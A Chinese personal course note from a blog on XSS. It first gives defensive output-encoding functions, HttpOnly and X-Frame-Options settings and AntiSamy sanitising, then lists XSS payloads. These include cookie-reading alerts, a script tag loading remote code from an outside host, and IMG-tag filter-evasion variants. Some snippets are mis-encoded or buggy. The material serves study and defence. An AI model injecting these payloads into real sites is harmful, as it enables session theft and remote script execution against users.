NEU网络攻防XSS--Attack（个人笔记，仅供参考）

最新推荐文章于 2022-07-18 23:12:36 发布

麻瓜蛋蛋

最新推荐文章于 2022-07-18 23:12:36 发布

阅读量174

点赞数

文章标签： xss

本文链接：https://blog.youkuaiyun.com/qq_44002133/article/details/111052268

版权

Xss防御
1.
function encodeForHTML(str, kwargs){
 return ('' + str)
 .replace(/&/g, '&amp;')
 .replace(/</g, '&lt;') // DEC=> &#60; HEX=> &#x3c; Entity=> &lt;
 .replace(/>/g, '&gt;')
 .replace(/"/g, '&quot;')
 .replace(/'/g, '&#x27;') // &apos; 
 .replace(/\//g, '&#x2F;');
 }; 

2、
function encodeForHTMLAttibute(str, kwargs){
let encoded = '';
 for(let i = 0; i < str.length; i++) {
 let ch = hex = str[i];
 if (!/[A-Za-z0-9]/.test(str[i]) && str.charCodeAt(i) < 256) {
 hex = '&#x' + ch.charCodeAt(0).toString(16) + ';';
 }
 encoded += hex;
 }
 return encoded;
 }; 

3、
function encodeForJavascript(str, kwargs) {
 let encoded = '';
 for(let i = 0; i < str.length; i++) {
 let cc = hex = str[i];
 if (!/[A-Za-z0-9]/.test(str[i]) && str.charCodeAt(i) < 256) {
 hex = '\\x' + cc.charCodeAt().toString(16);
 }
 encoded += hex;
 }
 return encoded;
 }; 
4、
function encodeForURL(str, kwargs){
 return encodeURIComponent(str);
};

5、
function encodeForCSS (attr, str, kwargs){
 let encoded = '';
 for (let i = 0; i < str.length; i++) {
 let ch = str.charAt(i);
 if (!ch.match(/[a-zA-Z0-9]/) {
 let hex = str.charCodeAt(i).toString(16);
 let pad = '000000'.substr((hex.length));
 encoded += '\\' + pad + hex;
 } else {
 encoded += ch;
 }
 }
 return encoded;
 };


6、
response.setHeader("Set-Cookie","cookiename=value; Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");

7、
Policy ploicy = Policy.getInstance(POLICY_FILE_LOCATION);
AntiSamy as = new AntiSamy();
CleanResults cr = as.scan(dirtyInput, policy);
MyUserDao.storeUserProfile(cr.getCleanHTML());

8、
<span>${username}</span>
<p><c:out value="${username}"></c:out></p>
<input type="text" value="${username}" />

9、
<system.webServer>
  ...
  <httpProtocol>
    <customHeaders>
      <add name="X-Frame-Options" value="SAMEORIGIN" />
    </customHeaders>
  </httpProtocol>
 
10.
<input type="button" οnclick='go_to_url("${myUrl}");' />


Xss 攻击
1.获取用户的cookie

<script>alert(document.cookie)</script>

οnclick=alert(document.cookie)

2. Disrupt page layout

<iframe src="http://baidu.com"></iframe>

<script>alert("hello")</script>

3. Normal XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

4.IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

5.IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>

6.IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

7.HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>

8.修正缺陷IMG标签
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

9.formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

10.嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>